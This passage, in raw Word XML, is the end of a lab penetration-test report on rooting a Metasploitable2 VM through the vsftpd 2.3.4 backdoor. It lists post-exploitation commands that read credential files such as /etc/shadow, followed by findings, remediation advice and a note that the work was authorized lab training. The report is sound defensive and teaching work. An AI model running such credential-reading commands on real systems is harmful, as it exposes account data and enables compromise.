      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uname -a</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ls -la /root</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F99FDB8">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5F0BF8">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>id confirmed uid=0(root) gid=0(root) – full administrative privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679764D0">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hostname and uname -a confirmed the shell was running on the Metasploitable2 target, not the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310D8350">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ifconfig displayed the target's own network interface (192.168.56.106), verifying the session was remote.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2040128E">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/etc/passwd was readable, exposing the full list of system user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D88E0EC">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/etc/shadow (normally restricted to root) was successfully read, providing definitive proof of root-level access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA7D268">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/root was fully accessible, meaning an attacker could read, modify, or delete any file on the system, install persistence mechanisms, or pivot further into the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3358A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>6.1 Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7EE32E">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This vulnerability allows any unauthenticated remote attacker with network access to the FTP service to gain complete, unrestricted root control of the target system. This is the most severe possible outcome of a network-facing vulnerability: total compromise of confidentiality, integrity, and availability with a single, trivial command sequence and no valid credentials required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E457E9A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>7. Phase 5: Findings &amp; Remediation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7"/>
        <w:gridCol w:w="3117"/>
        <w:gridCol w:w="3116"/>
      </w:tblGrid>
      <w:tr w14:paraId="69C6C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17" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="5A666904">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="3396B74B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="43FBA06F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="32A2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shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="620BD47C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4 backdoor (CVE-2011-2523)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="08A827F8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2D795F75">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Immediately remove/upgrade vsftpd to a current, verified version; never install packages from unverified mirrors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6C82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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7870615D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Multiple outdated, unpatched services (Samba, Tomcat, UnrealIRCd, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="420A2BFD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="52C34F20">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Patch or decommission legacy services; this VM is intentionally vulnerable and should never be exposed outside an isolated lab network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="29C0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shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="46CF6854">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No network segmentation between attacker and target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="44518B3B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium (lab context)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="774C39EB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>In production, apply strict network segmentation, firewalling, and least-privilege access between hosts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7F3A3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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="17625E2F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No intrusion detection observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1CE8302E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A074099">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deploy IDS/IPS and file-integrity monitoring to detect anomalous shell connections such as the one on port 6200.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C108F06">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A071ADF">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>7.1 General Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115A806">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Verify checksums/signatures of all downloaded software packages before installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FEA76B">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Maintain an up-to-date patch management process for all exposed services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557C4921">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Disable or remove unnecessary services (telnet, rsh, X11, etc. were all found open in this assessment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FDAB3E">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Restrict FTP and other legacy protocols in favor of encrypted alternatives (SFTP/FTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3E102B">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implement network monitoring to flag unexpected listening ports such as 6200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC8975C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>8. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8901D3">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This engagement successfully demonstrated the full attack lifecycle against Metasploitable2, from initial reconnaissance through to root-level compromise via the vsftpd 2.3.4 backdoor (CVE-2011-2523). The exercise highlights the severe risk posed by supply-chain compromises in software distribution and reinforces the importance of patch management, package integrity verification, and network segmentation in defending real-world systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF2D09E">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All testing was conducted in an isolated, non-production lab environment as part of an authorized internship training task.</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3DE143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476</Words>
  <Characters>3071</Characters>
  <TotalTime>6</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3449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2026-07-03T06:11:00Z</dcterms:created>
  <dc:creator>Un-named</dc:creator>
  <cp:lastModifiedBy>nbnav</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-03T06:18:24Z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1033-12.1.0.26880</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>2D4575C3761A48258EAA0997447DFD07_12</vt:lpwstr>
  </property>
</Properties>
</file>